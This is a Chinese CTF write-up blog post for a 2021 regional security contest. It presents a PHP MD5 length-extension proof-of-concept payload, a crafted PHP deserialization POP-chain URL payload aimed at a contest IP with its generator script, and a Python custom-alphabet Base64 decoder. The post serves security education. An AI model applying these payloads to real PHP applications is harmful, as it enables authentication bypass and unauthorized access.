冀信2021网络安全竞赛-廊坊分赛

CTF
CTF
发布日期:   2021-10-18
文章字数:   512
阅读时长:   3 分
阅读次数:  

BabyMd5

http://IP:50197/source.txt

<?php
if(!isset($_POST["username"]) || !isset($_POST["password"])){
    exit();
}
$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["check"])) {


    if (urldecode($username) === "admin" && urldecode($password) != "admin") {
        if ($_COOKIE["check"] === md5($secret . urldecode($username . $password))) {
            echo "Login successful.\n";
            die ("The flag is ". $flag);
        }
        else {
            die ("Wrong Cookies. Get out!");
        }
    }
    else {
        die ("Admins only");
    }
}

setcookie("ahash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
?>

POC

username=admin&password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a0%00%00%00%00%00%00%00xxx

反序列化

http://183.196.135.117:50957/?a=O:4:%22TOPC%22:2:{s:3:%22obj%22;N;s:4:%22attr%22;O:4:%22TOPB%22:2:{s:3:%22obj%22;N;s:4:%22attr%22;s:127:%22O:4:%22TOPA%22:4:{s:5:%22token%22;N;s:6:%22ticket%22;R:2;s:8:%22username%22;s:17:%22aaaaaaaaaaaaaaaaa%22;s:8:%22password%22;s:18:%22bbbbbbbbbbbbbbbbbb%22;}%22;}}

pop链是C->echo->B->tostring

<?php

class TOPA{
    public $token;
    public $ticket;
    public $username;
    public $password;
    function __construct(){
        $this->ticket = &$this->token;
    }
}

class TOPB{
    public $obj;
    public $attr;
    function __construct($a){
            $this->attr = $a;
    }
}

class TOPC{
    public $obj;
    public $attr;

    function __construct($a){
        $this->attr = $a;
    }
}

$a = new TOPA();
$ser_a = serialize($a);
$b = new TOPB($ser_a);
$c = new TOPC($b);
$ser_c = serialize($c);
echo($ser_c);

通过&来取址赋值

bas

Base64换表

import base64

m = '''They camefirst for the Communists,
and I didn't speak upbecause I wasn't a Communist.
Then they came for the Jews,
and I didn't speak upbecause I wasn't a Jew.
Then they came for the trade unionists,
and I didn't speak upbecause I wasn't a trade unionist.
Then they came for the Catholics,
and I didn't speak upbecause I was a Protestant.
Then they came for me,
but by that timeno one was left to speak up.'''.encode()


s1 = base64.b64encode(m).decode()
s2 = "ETsovHYqBD8oAnobx6JtAn0bRSIlAHYWy78gwD4kx6IaOZksynJtHHYpzDIfQ6Jtx6YoBDhtwCYrADMswCMoRVptw7Uayrw9RTVtJ70gyCEfzCM9OtkFzTEfRSIlACptB7UgAHYny6RtwTsoRVkow6NhXnUfAXYQRTIkAT5mwXYaxTEszbY8xTQoB7U8x7FtHHY6BCMfQ6JtBHYPACxfXoIlAD5twTsovHYqBD8oRTAexrY9zTFtwSQsATFtwD4ky74kx6IaOZksynJtHHYpzDIfQ6Jtx6YoBDhtwCYrADMswCMoRVptw7Uayrw9RTVtwSQsATFtwD4ky74kx6JfXoIlAD5twTsovHYqBD8oRTAexrY9zTFtJ7U9zT0hzDMaOZksynJtHHYpzDIfQ6Jtx6YoBDhtwCYrADMswCMoRVptw7UaRTVtFSQewTEawTUfwX5PETsoyrY9zTE4RTMsyDFtAn0bRT8oOZkrwCJtBmptwTsswXY9zD8oyn1ty74oRSwsxbYhADA9RSIeRSMdADUiRSEdOt=="
chargeList = []
for i in range(len(s1)):
    tmp1 = [s1[i], s2[i]]
    tmp2 = [s2[i], s1[i]]
    if tmp1 not in chargeList and tmp2 not in chargeList:
        chargeList.append(tmp1)
        chargeList.append(tmp2)
print(chargeList, len(chargeList))


flag_enc = "AncsA6gsATN7LDAqBGZdMTFbAWAoNapcAqAsBqwoMqtaMnFdMC9"
flag = ""
for i in flag_enc:
    for j in chargeList:
        if j[1] == i:
            flag += j[0]
print(flag)
print(base64.b64decode(flag + "=="))
文章作者: Augu5t
文章链接: https://github.com/Starry5ky/starry5ky.github.io/2021/10/18/ji-xin-2021-wang-luo-an-quan-jing-sai-lang-fang-fen-sai/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Augu5t !
CTF
  目录